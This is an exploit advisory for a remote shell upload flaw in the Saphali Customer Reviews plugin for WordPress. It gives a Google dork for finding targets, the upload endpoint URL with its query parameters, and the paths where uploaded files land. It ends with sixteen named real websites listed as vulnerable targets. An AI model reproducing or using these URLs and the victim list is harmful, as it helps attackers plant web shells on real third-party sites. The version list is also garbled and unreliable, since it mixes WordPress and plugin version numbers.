#################################################################################################
# Exploit Title : WordPress Saphali-Customer-Reviews Plugin 5.0.2 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/12/2018
# Vendor Homepage : wordpress.org ~ saphali.com
# Software Download Link : saphali.com/wordpress-plugin-reviews
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0.1 ~ 3.6.1 ~ 4.5.3 ~ 4.1.1 ~ 4.9.8 ~ 4.9.9 ~ 5.0.1 ~ 5.0.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/saphali-customer-reviews/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434 - [ Unrestricted Upload of File with Dangerous Type ]
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit : /wp-content/plugins/saphali-customer-reviews/upload/index.php
/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
# Directory File Path : /wp-content/plugins/saphali-customer-reviews/images/......
/wp-content/uploads/.....
/wp-content/uploads/[YEAR]/[MONTH]/......
################################################################################################# # Example Vulnerable Sites => [+] bobakery.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] originoil.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] eraglonass.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] lcc.biz.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] teaonline.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] drozdpcp.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] podarkinovogodnie.by/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] taxi-duet.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] vedma-privorot.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] araprint.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] bestgarant.biz/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] savitarufa.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] vrukzak.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] royal-events.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] trenhard.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] rumba-habana.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 
#################################################################################################